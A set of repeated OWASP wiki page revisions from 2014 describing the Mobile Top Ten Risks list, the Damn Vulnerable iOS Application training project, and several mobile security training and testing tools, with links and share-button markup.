*[[Mobile_Top_10_2014-M7|M7: Client Side Injection ]]
*[[Mobile_Top_10_2014-M8|M8: Security Decisions Via Untrusted Inputs ]]
*[[Mobile_Top_10_2014-M9|M9: Improper Session Handling ]]
*[[Mobile_Top_10_2014-M10|M10: Lack of Binary Protections ]]

== Project Leads, Credit, and Contributions ==

* ''' [[Mobile_Top_Contributions|Mobile Top Ten Contributions Page ]] '''

== Project Methodology ==

* '''We adhered loosely to the [https://www.owasp.org/index.php/Top_10_2013/ProjectMethodology OWASP Web Top Ten Project methodology]. '''

== Archive ==
* The list below is the OLD release candidate v1.0 of the OWASP Top 10 Mobile Risks.  This list was initially released on September 23, 2011 at Appsec USA.  

*** The original presentation can be found here: [http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks SLIDES]<br>
*** The corresponding video can be found here: [http://www.youtube.com/watch?v=GRvegLOrgs0 VIDEO]
*** [[Mobile_Top_10_2012|2011-12 Mobile Top Ten for archive purposes]]
__NOTOC__

OWASP DVIA

2014-02-04T02:06:09Z

Jason Haddix:

= Main =

<b>Welcome to the Damn Vulnerable iOS Application home page.</b>

Damn Vulnerable iOS application is a project started by Prateek Gianchandani which gives mobile testers and developers an iOS application to practice attacking/defending skill sets. Each challenge area corresponds to an in-depth article designed to teach the fundamentals of mobile security on the iOS platform. Some challenge categories include multiple challenge types.

Current Challenge Categories:

* Insecure Data Storage (4 exercises)
* Jailbreak Detection (2 exercises)
* Runtime Manipulation (3 exercises)
* Transport Layer Security (1 exercise)
* Client Side Injection (1 exercise)
* Broken Cryptography (1 exercise)
* Binary Patching (4 exercises)

= Framework =

= Status =

= Project About =

Damn Vulnerable iOS application is a project started by Prateek Gianchandani which gives mobile testers and developers an iOS application to practice attacking/defending skill sets. Each challenge area corresponds to an in-depth article designed to teach the fundamentals of mobile security on the iOS platform. Some challenge categories include multiple challenge types.

<br> __NOTOC__ <headertabs />

[[Category:OWASP_Project|DVIA Project]]
[[Category:OWASP_Tool]]
[[Category:OWASP_Alpha_Quality_Tool]]

OWASP DVIA

2014-02-04T02:02:58Z

Jason Haddix:

= Main =

<b>Welcome to the Damn Vulnerable iOS Application home page.</b>

Damn Vulnerable iOS application is a project started by Prateek Gianchandani which gives mobile testers and developers an iOS application to practice attacking/defending skill sets. Each challenge area corresponds to an in-depth article designed to teach the fundamentals of mobile security on the iOS platform. Some challenge categories include multiple challenge types.

Current Challenge Categories:

* Insecure Data Storage (4 exercises)
* Jailbreak Detection (2 exercises)
* Runtime Manipulation (3 exercises)
* Transport Layer Security (1 exercise)
* Client Side Injection (1 exercise)
* Broken Cryptography (1 exercise)
* Binary Patching (4 exercises)

= Framework =

= Status =

= Project About =

{{:Projects/OWASP DVIA Project | Project About}}

<br> __NOTOC__ <headertabs />

[[Category:OWASP_Project|DVIA Project]]
[[Category:OWASP_Tool]]
[[Category:OWASP_Alpha_Quality_Tool]]

OWASP DVIA

2014-02-04T02:02:37Z

Jason Haddix: Created page with "= Main = <b>Welcome to the Damn Vulnerable iOS Application home page.</b> Damn Vulnerable iOS application is a project started by Prateek Gianchandani which gives mobile t..."

= Main =

<b>Welcome to the Damn Vulnerable iOS Application home page.</b>

Damn Vulnerable iOS application is a project started by Prateek Gianchandani which gives mobile testers and developers an iOS application to practice attacking/defending skill sets. Each challenge area corresponds to an in-depth article designed to teach the fundamentals of mobile security on the iOS platform. Some challenge categories include multiple challenge types.

Current Challenge Categories:

* Insecure Data Storage (4 exercises)
* Jailbreak Detection (2 exercises)
* Runtime Manipulation (3 exercises)
* Transport Layer Security (1 exercise)
* Client Side Injection (1 exercise)
* Broken Cryptography (1 exercise)
* Binary Patching (4 exercises)

= Framework =

= Status =

= Project About =

{{:Projects/OWASP iGoat Project | Project About}}

<br> __NOTOC__ <headertabs />

[[Category:OWASP_Project|DVIA Project]]
[[Category:OWASP_Tool]]
[[Category:OWASP_Alpha_Quality_Tool]]

Projects/OWASP Mobile Security Project - Mobile Tools

2014-02-04T02:00:39Z

Jason Haddix:

== iMAS ==

iMAS is a collaborative research project from the MITRE Corporation focused on open source iOS security controls. Today, iOS meets the enterprise security needs of customers, however many security experts cite critical vulnerabilities and have demonstrated exploits, which pushes enterprises to augment iOS deployments with commercial solutions. The iMAS intent is to protect iOS applications and data beyond the Apple provided security model and reduce the adversary’s ability and efficiency to perform recon, exploitation, control and execution on iOS mobile applications. iMAS will transform the effectiveness of the existing iOS security model across major vulnerability areas including the System Passcode, jailbreak, debugger / run-time, flash storage, and the system keychain. Research outcomes include an open source secure application framework, including an application container, developer and validation tools/techniques.

[https://www.owasp.org/index.php/OWASP_iMAS_iOS_Mobile_Application_Security_Project iMas Project Page]

The source code for iMAS is available on GitHub: [https://github.com/project-imas/about iMAS Source Code]

== GoatDroid ==

OWASP GoatDroid is a fully functional and self-contained training environment for educating developers and testers on Android security. GoatDroid requires minimal dependencies and is ideal for both Android beginners as well as more advanced users. The project currently includes two applications: FourGoats, a location-based social network, and Herd Financial, a mobile banking application. There are also several features that greatly simplify usage within a training environment or for absolute beginners who want a good introduction to working with the Android platform.

As the Android SDK introduces new features, the GoatDroid contributors will strive to implement up-to-date lessons that can educate developers and security testers on new security issues. The project currently provides coverage for most of the OWASP Top 10 Mobile Risks and also includes a bunch of other problems as well.

You can find GoatDroid on GitHub: [https://github.com/jackMannino/OWASP-GoatDroid-Project GoatDroid Source Code]

[https://www.owasp.org/index.php/Projects/OWASP_GoatDroid_Project GoatDroid Project Page]

== iGoat ==

iGoat is a learning tool for iOS developers (iPhone, iPad, etc.). It was inspired by the WebGoat project, and has a similar conceptual flow to it.

As such, iGoat is a safe environment where iOS developers can learn about the major security pitfalls they face as well as how to avoid them. It is made up of a series of lessons that each teach a single (but vital) security lesson.

The lessons are laid out in the following steps:

# Brief introduction to the problem.
# Verify the problem by exploiting it.
# Brief description of available remediations to the problem.
# Fix the problem by correcting and rebuilding the iGoat program.

Step 4 is optional, but highly recommended for all iOS developers. Assistance is available within iGoat if you don't know how to fix a specific problem.

iGoat is free software, released under the GPLv3 license.

[https://www.owasp.org/index.php/OWASP_iGoat_Project iGoat Project Page]

The iGoat source code is available on Google Code [http://code.google.com/p/owasp-igoat/ iGoat Source Code]

== Damn Vulnerable iOS Application ==

Damn Vulnerable iOS application is a project started by Prateek Gianchandani which gives mobile testers and developers an iOS application to practice attacking/defending skill sets. Each challenge area corresponds to an in-depth article designed to teach the fundamentals of mobile security on the iOS platform. Some challenge categories include multiple challenge types.

The current challenge categories:

* Insecure Data Storage (4 exercises)
* Jailbreak Detection (2 exercises)
* Runtime Manipulation (3 exercises)
* Transport Layer Security (1 exercise)
* Client Side Injection (1 exercise)
* Broken Cryptography (1 exercise)
* Binary Patching (4 exercises)

[https://www.owasp.org/index.php/OWASP_DVIA DVIA OWASP Project Page]

[https://github.com/prateek147/DVIA DVIA Github Source]

[http://damnvulnerableiosapp.com/#learn DVIA Learning Resources]

== MobiSec ==

The MobiSec Live Environment Mobile Testing Framework project is a live environment for testing mobile environments, including devices, applications, and supporting infrastructure. The purpose is to provide attackers and defenders the ability to test their mobile environments to identify design weaknesses and vulnerabilities. The MobiSec Live Environment provides a single environment for testers to leverage the best of all available open source mobile testing tools, as well as the ability to install additional tools and platforms, that will aid the penetration tester through the testing process as the environment is structured and organized based on an industry‐proven testing framework. Using a live environment provides penetration testers the ability to boot the MobiSec Live Environment on any Intel-based system from a DVD or USB flash drive, or run the test environment within a virtual machine.

[https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_MobiSec Project Page]

MobiSec can be downloaded from Sourceforge: [http://sourceforge.net/p/mobisec/wiki/Home/ MobiSec Download Repository]

== Androick ==

Androick is a collaborative research project from PHONESEC Ltd. With our tool, you can evaluate some risks on Android mobile applications.
Androick is a tool that allows any user to analyze an Android application. It can get the apk file, all the datas and the databases in sqlite3 and csv format.
Only for Pentesters or Researchers.

[https://www.owasp.org/index.php/Projects/OWASP_Androick_Project Androick Project Page]

Projects/OWASP Mobile Security Project - Top Ten Mobile Risks

2014-01-30T06:48:26Z

Jason Haddix:

<center><br style="clear:both" />
{| align="center" style="width:45%; background-color:#FFFFFF; border:1px solid #a7d7f9; -moz-border-radius: 9px;-webkit-border-radius: 9px; border-radius: 9px; padding:1px;" id="social_bookmarks" class="noprint"
|-
|
<div class="plainlinks" align="center">
'''Share this:''' 
<span title="Share via e-mail" class="plainlinks">[[File:social-email.png|E-mail this story|link=mailto:?subject={{FULLPAGENAMEE}}&body={{FULLPAGENAMEE}}:%0A{{fullurle:{{FULLPAGENAME}}}}]]</span>
<span title="Share on Facebook">[[File:social-facebook.png|Bookmark with Facebook|link=http://www.facebook.com/sharer.php?u={{fullurle:{{FULLPAGENAME}}}}&t={{urlencode:{{FULLPAGENAME}}}}]]</span>
<span title="Share on Digg">[[File:social-digg.png|Share on Digg.com|link=http://digg.com/submit?url={{fullurle:{{FULLPAGENAME}}}}&title={{urlencode:{{FULLPAGENAME}} }}]]</span>
<span title="Share on delicious">[[File:social-delicious.png|16px|Share on delicious|link=http://delicious.com/post?url={{fullurle:{{FULLPAGENAME}}}}&title={{urlencode:{{FULLPAGENAME}}}}]]</span>
<span title="Share on reddit">[[File:social-reddit.png|Share on reddit.com|link=http://reddit.com/submit?url={{fullurle:{{FULLPAGENAME}}}}&title={{urlencode:{{FULLPAGENAME}}}}]]</span>
<span title="Share on StumbleUpon">[[File:social-stumbleupon.png|16px|Share on stumbleupon.com|link=http://stumbleupon.com/submit?url={{fullurle:{{FULLPAGENAME}}}}&title={{urlencode:{{FULLPAGENAME}}}}]]</span>
<span title="Share on LinkedIn">[[File:social-linkedin.png|16px|Share on LinkedIn.com|link=http://www.linkedin.com/shareArticle?mini=true&url={{fullurle:{{FULLPAGENAME}}}}&title={{urlencode:{{FULLPAGENAME}}}}]]</span>
<span title="Share on Twitter">[[File:social-twitter.png|alt=Share on twitter.com|link=http://twitter.com/?status={{fullurle:{{FULLPAGENAME}}}}|Share on twitter.com]]</span>
<span title="Seed on Newsvine">[[File:social-newsvine.png|16px|Seed on Newsvine|link=http://www.newsvine.com/_wine/save?popoff=1&u={{fullurle:{{FULLPAGENAME}}}}]]</span>
</div>
|}
</center>
== About this list ==
In 2013 we polled the industry for new vulnerability statistics in the field of mobile applications. What you see here is a result of that data and a representation of the mobile application threat landscape.

Our road-map for 2014 includes:
[[File:2014-01-26 20-23-29.png|right|550px]]
* More updates to the wiki content; including cross-linking to testing guides, more visual exercises, etc.
* A PDF release.

This list is still a work in progress. We are small group doing this work and could use more help! If you are interested, please contact one of the project leads.

== Top 10 Mobile Risks - Re-Release Candidate 2014 v1.0 ==
*[[Mobile_Top_10_2014-M1|M1: Weak Server Side Controls ]]
*[[Mobile_Top_10_2014-M2|M2: Insecure Data Storage ]]
*[[Mobile_Top_10_2014-M3|M3: Insufficient Transport Layer Protection ]]
*[[Mobile_Top_10_2014-M4|M4: Unintended Data Leakage ]]
*[[Mobile_Top_10_2014-M5|M5: Poor Authorization and Authentication ]]
*[[Mobile_Top_10_2014-M6|M6: Broken Cryptography ]]
*[[Mobile_Top_10_2014-M7|M7: Client Side Injection ]]
*[[Mobile_Top_10_2014-M8|M8: Security Decisions Via Untrusted Inputs ]]
*[[Mobile_Top_10_2014-M9|M9: Improper Session Handling ]]
*[[Mobile_Top_10_2014-M10|M10: Lack of Binary Protections ]]

== Project Leads, Credit, and Contributions ==

* ''' [[Mobile_Top_Contributions|Mobile Top Ten Contributions Page ]] '''

== Project Methodology ==

* '''We adhered loosely to the [https://www.owasp.org/index.php/Top_10_2013/ProjectMethodology OWASP Web Top Ten Project methodology]. '''

== Archive ==
* The list below is the OLD release candidate v1.0 of the OWASP Top 10 Mobile Risks.  This list was initially released on September 23, 2011 at Appsec USA.  

*** The original presentation can be found here: [http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks SLIDES]<br>
*** The corresponding video can be found here: [http://www.youtube.com/watch?v=GRvegLOrgs0 VIDEO]
*** [[Mobile_Top_10_2012|2011-12 Mobile Top Ten for archive purposes]]
__NOTOC__

Projects/OWASP Mobile Security Project - Top Ten Mobile Risks

2014-01-30T06:47:23Z

Jason Haddix:

<center><br style="clear:both" />
{| align="center" style="width:45%; background-color:#FFFFFF; border:1px solid #a7d7f9; -moz-border-radius: 9px;-webkit-border-radius: 9px; border-radius: 9px; padding:1px;" id="social_bookmarks" class="noprint"
|-
|
<div class="plainlinks" align="center">
'''Share this:''' 
<span title="Share via e-mail" class="plainlinks">[[File:social-email.png|E-mail this story|link=mailto:?subject={{FULLPAGENAMEE}}&body={{FULLPAGENAMEE}}:%0A{{fullurle:{{FULLPAGENAME}}}}]]</span>
<span title="Share on Facebook">[[File:social-facebook.png|Bookmark with Facebook|link=http://www.facebook.com/sharer.php?u={{fullurle:{{FULLPAGENAME}}}}&t={{urlencode:{{FULLPAGENAME}}}}]]</span>
<span title="Share on Digg">[[File:social-digg.png|Share on Digg.com|link=http://digg.com/submit?url={{fullurle:{{FULLPAGENAME}}}}&title={{urlencode:{{FULLPAGENAME}} }}]]</span>
<span title="Share on delicious">[[File:social-delicious.png|16px|Share on delicious|link=http://delicious.com/post?url={{fullurle:{{FULLPAGENAME}}}}&title={{urlencode:{{FULLPAGENAME}}}}]]</span>
<span title="Share on reddit">[[File:social-reddit.png|Share on reddit.com|link=http://reddit.com/submit?url={{fullurle:{{FULLPAGENAME}}}}&title={{urlencode:{{FULLPAGENAME}}}}]]</span>
<span title="Share on StumbleUpon">[[File:social-stumbleupon.png|16px|Share on stumbleupon.com|link=http://stumbleupon.com/submit?url={{fullurle:{{FULLPAGENAME}}}}&title={{urlencode:{{FULLPAGENAME}}}}]]</span>
<span title="Share on LinkedIn">[[File:social-linkedin.png|16px|Share on LinkedIn.com|link=http://www.linkedin.com/shareArticle?mini=true&url={{fullurle:{{FULLPAGENAME}}}}&title={{urlencode:{{FULLPAGENAME}}}}]]</span>
<span title="Share on Twitter">[[File:social-twitter.png|alt=Share on twitter.com|link=http://twitter.com/?status={{fullurle:{{FULLPAGENAME}}}}|Share on twitter.com]]</span>
<span title="Seed on Newsvine">[[File:social-newsvine.png|16px|Seed on Newsvine|link=http://www.newsvine.com/_wine/save?popoff=1&u={{fullurle:{{FULLPAGENAME}}}}]]</span>
</div>
|}
</center>
== About this list ==
In 2013 we polled the industry for new vulnerability statistics in the field of mobile applications. What you see here is a result of that data and a representation of the mobile application threat landscape.

Our road-map for 2014 includes:
[[File:2014-01-26 20-23-29.png|right|550px]]
* More updates to the wiki content; including cross-linking to testing guides, more visual exercises, etc.
* A PDF release.

This list is still a work in progress. We are small group doing this work and could use more help! If you are interested, please contact one of the project leads.

== Top 10 Mobile Risks - Re-Release Candidate 2014 v1.0 ==
*[[Mobile_Top_10_2014-M1|M1: Weak Server Side Controls ]]
*[[Mobile_Top_10_2014-M2|M2: Insecure Data Storage ]]
*[[Mobile_Top_10_2014-M3|M3: Insufficient Transport Layer Protection ]]
*[[Mobile_Top_10_2014-M4|M4: Unintended Data Leakage ]]
*[[Mobile_Top_10_2014-M5|M5: Poor Authorization and Authentication ]]
*[[Mobile_Top_10_2014-M6|M6: Broken Cryptography ]]
*[[Mobile_Top_10_2014-M7|M7: Client Side Injection ]]
*[[Mobile_Top_10_2014-M8|M8: Security Decisions Via Untrusted Inputs ]]
*[[Mobile_Top_10_2014-M9|M9: Improper Session Handling ]]
*[[Mobile_Top_10_2014-M10|M10: Lack of Binary Protections ]]

== Project Leads, Credit, and Contributions ==

* ''' [[Mobile_Top_Contributions|Mobile Top Ten Contributions Page ]] '''

== Project Methodology ==

* '''We adhered loosely to the [https://www.owasp.org/index.php/Top_10_2013/ProjectMethodology OWASP Web Top Ten Project methodology]. '''

== Archive ==
* The list below is the OLD release candidate v1.0 of the OWASP Top 10 Mobile Risks.  This list was initially released on September 23, 2011 at Appsec USA.  

*** The original presentation can be found here: [http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks SLIDES]<br>
*** The corresponding video can be found here: [http://www.youtube.com/watch?v=GRvegLOrgs0 VIDEO]
*** [[Mobile_Top_10_2012|2011-12 Mobile Top Ten for archive purposes]]
__NOTOC__

Projects/OWASP Mobile Security Project - Top Ten Mobile Risks

2014-01-30T06:42:15Z

Jason Haddix:

<center><br style="clear:both" />
{| align="center" style="width:45%; background-color:#FFFFFF; border:1px solid #a7d7f9; -moz-border-radius: 9px;-webkit-border-radius: 9px; border-radius: 9px; padding:1px;" id="social_bookmarks" class="noprint"
|-
|
<div class="plainlinks" align="center">
'''Share this:''' 
<span title="Share via e-mail" class="plainlinks">[[File:social-email.png|E-mail this story|link=mailto:?subject={{FULLPAGENAMEE}}&body={{FULLPAGENAMEE}}:%0A{{fullurle:{{FULLPAGENAME}}}}]]</span>
<span title="Share on Facebook">[[File:social-facebook.png|Bookmark with Facebook|link=http://www.facebook.com/sharer.php?u={{fullurle:{{FULLPAGENAME}}}}&t={{urlencode:{{FULLPAGENAME}}}}]]</span>
<span title="Share on Digg">[[File:social-digg.png|Share on Digg.com|link=http://digg.com/submit?url={{fullurle:{{FULLPAGENAME}}}}&title={{urlencode:{{FULLPAGENAME}} }}]]</span>
<span title="Share on delicious">[[File:social-delicious.png|16px|Share on delicious|link=http://delicious.com/post?url={{fullurle:{{FULLPAGENAME}}}}&title={{urlencode:{{FULLPAGENAME}}}}]]</span>
<span title="Share on reddit">[[File:social-reddit.png|Share on reddit.com|link=http://reddit.com/submit?url={{fullurle:{{FULLPAGENAME}}}}&title={{urlencode:{{FULLPAGENAME}}}}]]</span>
<span title="Share on StumbleUpon">[[File:social-stumbleupon.png|16px|Share on stumbleupon.com|link=http://stumbleupon.com/submit?url={{fullurle:{{FULLPAGENAME}}}}&title={{urlencode:{{FULLPAGENAME}}}}]]</span>
<span title="Share on LinkedIn">[[File:social-linkedin.png|16px|Share on LinkedIn.com|link=http://www.linkedin.com/shareArticle?mini=true&url={{fullurle:{{FULLPAGENAME}}}}&title={{urlencode:{{FULLPAGENAME}}}}]]</span>
<span title="Share on Twitter">[[File:social-twitter.png|alt=Share on twitter.com|link=http://twitter.com/?status={{fullurle:{{FULLPAGENAME}}}}|Share on twitter.com]]</span>
<span title="Seed on Newsvine">[[File:social-newsvine.png|16px|Seed on Newsvine|link=http://www.newsvine.com/_wine/save?popoff=1&u={{fullurle:{{FULLPAGENAME}}}}]]</span>
</div>
|}
</center>
=== About this list ===
In 2013 we polled the industry for new vulnerability statistics in the field of mobile applications. What you see here is a result of that data and a representation of the mobile application threat landscape.

Our road-map for 2014 includes:
[[File:2014-01-26 20-23-29.png|right|550px]]
* More updates to the wiki content; including cross-linking to testing guides, more visual exercises, etc.
* A PDF release.

This list is still a work in progress. We are small group doing this work and could use more help! If you are interested, please contact one of the project leads.

=== Top 10 Mobile Risks - Re-Release Candidate 2014 v1.0 ===
*[[Mobile_Top_10_2014-M1|M1: Weak Server Side Controls ]]
*[[Mobile_Top_10_2014-M2|M2: Insecure Data Storage ]]
*[[Mobile_Top_10_2014-M3|M3: Insufficient Transport Layer Protection ]]
*[[Mobile_Top_10_2014-M4|M4: Unintended Data Leakage ]]
*[[Mobile_Top_10_2014-M5|M5: Poor Authorization and Authentication ]]
*[[Mobile_Top_10_2014-M6|M6: Broken Cryptography ]]
*[[Mobile_Top_10_2014-M7|M7: Client Side Injection ]]
*[[Mobile_Top_10_2014-M8|M8: Security Decisions Via Untrusted Inputs ]]
*[[Mobile_Top_10_2014-M9|M9: Improper Session Handling ]]
*[[Mobile_Top_10_2014-M10|M10: Lack of Binary Protections ]]

=== Additional Information ===

* ''' [[Mobile_Top_Contributions|Mobile Top Ten Contributions Page ]] '''

* '''We adhered loosely to the [https://www.owasp.org/index.php/Top_10_2013/ProjectMethodology OWASP Web Top Ten Project methodology]. '''

* The list below is the OLD release candidate v1.0 of the OWASP Top 10 Mobile Risks.  This list was initially released on September 23, 2011 at Appsec USA.  

*** The original presentation can be found here: [http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks SLIDES]<br>
*** The corresponding video can be found here: [http://www.youtube.com/watch?v=GRvegLOrgs0 VIDEO]
*** [[Mobile_Top_10_2012|2011-12 Mobile Top Ten for archive purposes]]

Projects/OWASP Mobile Security Project - Top Ten Mobile Risks

2014-01-30T06:40:56Z

Jason Haddix:

<center><br style="clear:both" />
{| align="center" style="width:45%; background-color:#FFFFFF; border:1px solid #a7d7f9; -moz-border-radius: 9px;-webkit-border-radius: 9px; border-radius: 9px; padding:1px;" id="social_bookmarks" class="noprint"
|-
|
<div class="plainlinks" align="center">
'''Share this:''' 
<span title="Share via e-mail" class="plainlinks">[[File:social-email.png|E-mail this story|link=mailto:?subject={{FULLPAGENAMEE}}&body={{FULLPAGENAMEE}}:%0A{{fullurle:{{FULLPAGENAME}}}}]]</span>
<span title="Share on Facebook">[[File:social-facebook.png|Bookmark with Facebook|link=http://www.facebook.com/sharer.php?u={{fullurle:{{FULLPAGENAME}}}}&t={{urlencode:{{FULLPAGENAME}}}}]]</span>
<span title="Share on Digg">[[File:social-digg.png|Share on Digg.com|link=http://digg.com/submit?url={{fullurle:{{FULLPAGENAME}}}}&title={{urlencode:{{FULLPAGENAME}} }}]]</span>
<span title="Share on delicious">[[File:social-delicious.png|16px|Share on delicious|link=http://delicious.com/post?url={{fullurle:{{FULLPAGENAME}}}}&title={{urlencode:{{FULLPAGENAME}}}}]]</span>
<span title="Share on reddit">[[File:social-reddit.png|Share on reddit.com|link=http://reddit.com/submit?url={{fullurle:{{FULLPAGENAME}}}}&title={{urlencode:{{FULLPAGENAME}}}}]]</span>
<span title="Share on StumbleUpon">[[File:social-stumbleupon.png|16px|Share on stumbleupon.com|link=http://stumbleupon.com/submit?url={{fullurle:{{FULLPAGENAME}}}}&title={{urlencode:{{FULLPAGENAME}}}}]]</span>
<span title="Share on LinkedIn">[[File:social-linkedin.png|16px|Share on LinkedIn.com|link=http://www.linkedin.com/shareArticle?mini=true&url={{fullurle:{{FULLPAGENAME}}}}&title={{urlencode:{{FULLPAGENAME}}}}]]</span>
<span title="Share on Twitter">[[File:social-twitter.png|alt=Share on twitter.com|link=http://twitter.com/?status={{fullurle:{{FULLPAGENAME}}}}|Share on twitter.com]]</span>
<span title="Seed on Newsvine">[[File:social-newsvine.png|16px|Seed on Newsvine|link=http://www.newsvine.com/_wine/save?popoff=1&u={{fullurle:{{FULLPAGENAME}}}}]]</span>
</div>
|}
</center>
=== About this list ===

In 2013 we polled the industry for new vulnerability statistics in the field of mobile applications. What you see here is a result of that data and a representation of the mobile application threat landscape.

Our road-map for 2014 includes:

* More updates to the wiki content; including cross-linking to testing guides, more visual exercises, etc.
* A PDF release.

This list is still a work in progress. We are small group doing this work and could use more help! If you are interested, please contact one of the project leads.

=== Top 10 Mobile Risks - Re-Release Candidate 2014 v1.0 ===
[[File:2014-01-26 20-23-29.png|right|550px]]
*[[Mobile_Top_10_2014-M1|M1: Weak Server Side Controls ]]
*[[Mobile_Top_10_2014-M2|M2: Insecure Data Storage ]]
*[[Mobile_Top_10_2014-M3|M3: Insufficient Transport Layer Protection ]]
*[[Mobile_Top_10_2014-M4|M4: Unintended Data Leakage ]]
*[[Mobile_Top_10_2014-M5|M5: Poor Authorization and Authentication ]]
*[[Mobile_Top_10_2014-M6|M6: Broken Cryptography ]]
*[[Mobile_Top_10_2014-M7|M7: Client Side Injection ]]
*[[Mobile_Top_10_2014-M8|M8: Security Decisions Via Untrusted Inputs ]]
*[[Mobile_Top_10_2014-M9|M9: Improper Session Handling ]]
*[[Mobile_Top_10_2014-M10|M10: Lack of Binary Protections ]]

=== Additional Information ===

* ''' [[Mobile_Top_Contributions|Mobile Top Ten Contributions Page ]] '''

* '''We adhered loosely to the [https://www.owasp.org/index.php/Top_10_2013/ProjectMethodology OWASP Web Top Ten Project methodology]. '''

* The list below is the OLD release candidate v1.0 of the OWASP Top 10 Mobile Risks.  This list was initially released on September 23, 2011 at Appsec USA.  

*** The original presentation can be found here: [http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks SLIDES]<br>
*** The corresponding video can be found here: [http://www.youtube.com/watch?v=GRvegLOrgs0 VIDEO]
*** [[Mobile_Top_10_2012|2011-12 Mobile Top Ten for archive purposes]]

Projects/OWASP Mobile Security Project - Top Ten Mobile Risks

2014-01-30T06:34:24Z

Jason Haddix:

<center>
<br style="clear:both" />
{| align="center" style="width:45%; background-color:#FFFFFF; border:1px solid #a7d7f9; -moz-border-radius: 9px;-webkit-border-radius: 9px; border-radius: 9px; padding:1px;" id="social_bookmarks" class="noprint"
|-
|
<div class="plainlinks" align="center">
'''Share this:''' 
<span title="Share via e-mail" class="plainlinks">[[File:social-email.png|E-mail this story|link=mailto:?subject={{FULLPAGENAMEE}}&body={{FULLPAGENAMEE}}:%0A{{fullurle:{{FULLPAGENAME}}}}]]</span>
<span title="Share on Facebook">[[File:social-facebook.png|Bookmark with Facebook|link=http://www.facebook.com/sharer.php?u={{fullurle:{{FULLPAGENAME}}}}&t={{urlencode:{{FULLPAGENAME}}}}]]</span>
<span title="Share on Digg">[[File:social-digg.png|Share on Digg.com|link=http://digg.com/submit?url={{fullurle:{{FULLPAGENAME}}}}&title={{urlencode:{{FULLPAGENAME}} }}]]</span>
<span title="Share on delicious">[[File:social-delicious.png|16px|Share on delicious|link=http://delicious.com/post?url={{fullurle:{{FULLPAGENAME}}}}&title={{urlencode:{{FULLPAGENAME}}}}]]</span>
<span title="Share on reddit">[[File:social-reddit.png|Share on reddit.com|link=http://reddit.com/submit?url={{fullurle:{{FULLPAGENAME}}}}&title={{urlencode:{{FULLPAGENAME}}}}]]</span>
<span title="Share on StumbleUpon">[[File:social-stumbleupon.png|16px|Share on stumbleupon.com|link=http://stumbleupon.com/submit?url={{fullurle:{{FULLPAGENAME}}}}&title={{urlencode:{{FULLPAGENAME}}}}]]</span>
<span title="Share on LinkedIn">[[File:social-linkedin.png|16px|Share on LinkedIn.com|link=http://www.linkedin.com/shareArticle?mini=true&url={{fullurle:{{FULLPAGENAME}}}}&title={{urlencode:{{FULLPAGENAME}}}}]]</span>
<span title="Share on Twitter">[[File:social-twitter.png|alt=Share on twitter.com|link=http://twitter.com/?status={{fullurle:{{FULLPAGENAME}}}}|Share on twitter.com]]</span>
<span title="Seed on Newsvine">[[File:social-newsvine.png|16px|Seed on Newsvine|link=http://www.newsvine.com/_wine/save?popoff=1&u={{fullurle:{{FULLPAGENAME}}}}]]</span>
</div>
|}
</center>
=== About this list ===

In 2013 we polled the industry for new vulnerability statistics in the field of mobile applications. What you see here is a result of that data and a representation of the mobile application threat landscape.

Our road-map for 2014 includes:

* More updates to the wiki content; including cross-linking to testing guides, more visual exercises, etc.
* A PDF release.

This list is still a work in progress. We are small group doing this work and could use more help! If you are interested, please contact one of the project leads.

=== Top 10 Mobile Risks - Re-Release Candidate 2014 v1.0 ===
[[File:2014-01-26 20-23-29.png|right|550px]]
*[[Mobile_Top_10_2014-M1|M1: Weak Server Side Controls ]]
*[[Mobile_Top_10_2014-M2|M2: Insecure Data Storage ]]
*[[Mobile_Top_10_2014-M3|M3: Insufficient Transport Layer Protection ]]
*[[Mobile_Top_10_2014-M4|M4: Unintended Data Leakage ]]
*[[Mobile_Top_10_2014-M5|M5: Poor Authorization and Authentication ]]
*[[Mobile_Top_10_2014-M6|M6: Broken Cryptography ]]
*[[Mobile_Top_10_2014-M7|M7: Client Side Injection ]]
*[[Mobile_Top_10_2014-M8|M8: Security Decisions Via Untrusted Inputs ]]
*[[Mobile_Top_10_2014-M9|M9: Improper Session Handling ]]
*[[Mobile_Top_10_2014-M10|M10: Lack of Binary Protections ]]

=== Project Leads & Contributors ===

*[[Mobile_Top_Contributions|Mobile Top Ten Contributions Page ]]

=== Archive ===

The list below is the OLD release candidate v1.0 of the OWASP Top 10 Mobile Risks.  This list was initially released on September 23, 2011 at Appsec USA.  

The original presentation can be found here: [http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks SLIDES]<br>
The corresponding video can be found here: [http://www.youtube.com/watch?v=GRvegLOrgs0 VIDEO]
*[[Mobile_Top_10_2012|2011-12 Mobile Top Ten for archive purposes]]

=== Project Methodology ===

We adhered loosely to the [https://www.owasp.org/index.php/Top_10_2013/ProjectMethodology OWASP Web Top Ten Project methodology].

Projects/OWASP Mobile Security Project - Top Ten Mobile Risks

2014-01-30T06:31:35Z

Jason Haddix:

<center>
<br style="clear:both" />
{| align="center" style="width:45%; background-color:#FFFFFF; border:1px solid #a7d7f9; -moz-border-radius: 9px;-webkit-border-radius: 9px; border-radius: 9px; padding:1px;" id="social_bookmarks" class="noprint"
|-
|
<div class="plainlinks" align="center">
'''Share this:''' 
<span title="Share via e-mail" class="plainlinks">[[File:social-email.png|E-mail this story|link=mailto:?subject={{FULLPAGENAMEE}}&body={{FULLPAGENAMEE}}:%0A{{fullurle:{{FULLPAGENAME}}}}]]</span>
<span title="Share on Facebook">[[File:social-facebook.png|Bookmark with Facebook|link=http://www.facebook.com/sharer.php?u={{fullurle:{{FULLPAGENAME}}}}&t={{urlencode:{{FULLPAGENAME}}}}]]</span>
<span title="Share on Digg">[[File:social-digg.png|Share on Digg.com|link=http://digg.com/submit?url={{fullurle:{{FULLPAGENAME}}}}&title={{urlencode:{{FULLPAGENAME}} }}]]</span>
<span title="Share on delicious">[[File:social-delicious.png|16px|Share on delicious|link=http://delicious.com/post?url={{fullurle:{{FULLPAGENAME}}}}&title={{urlencode:{{FULLPAGENAME}}}}]]</span>
<span title="Share on reddit">[[File:social-reddit.png|Share on reddit.com|link=http://reddit.com/submit?url={{fullurle:{{FULLPAGENAME}}}}&title={{urlencode:{{FULLPAGENAME}}}}]]</span>
